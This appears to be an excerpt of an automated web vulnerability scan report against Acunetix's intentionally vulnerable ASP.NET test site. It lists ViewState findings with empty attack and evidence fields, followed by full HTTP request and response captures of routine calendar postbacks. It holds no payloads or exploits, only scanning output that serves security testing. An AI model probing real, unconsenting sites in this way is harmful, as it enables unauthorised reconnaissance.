Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1107 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,107 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8462&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgDAbDt6G9sIZGRkRUKOmOvURr2LrVMnR50X57D6rvQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK3w57tDQLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJ1kHVnieRPARatokydrOkcOOgu4E%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:59:05 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgDAbDt6G9sIZGRkRUKOmOvURr2LrVMnR50X57D6rvQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK3w57tDQLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJ1kHVnieRPARatokydrOkcOOgu4E=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:White" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1111 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,111 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8466&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgDAE%2BWeHtsIZGRkbXqPL0avBKupzc0Ak7q2%2ByXeYV8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKJ0fXtAgLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJb2F5i4g7eTH74T8ltRlcokbTScc%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:10:26 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgDAE+WeHtsIZGRkbXqPL0avBKupzc0Ak7q2+yXeYV8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKJ0fXtAgLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJb2F5i4g7eTH74T8ltRlcokbTScc=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:White" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
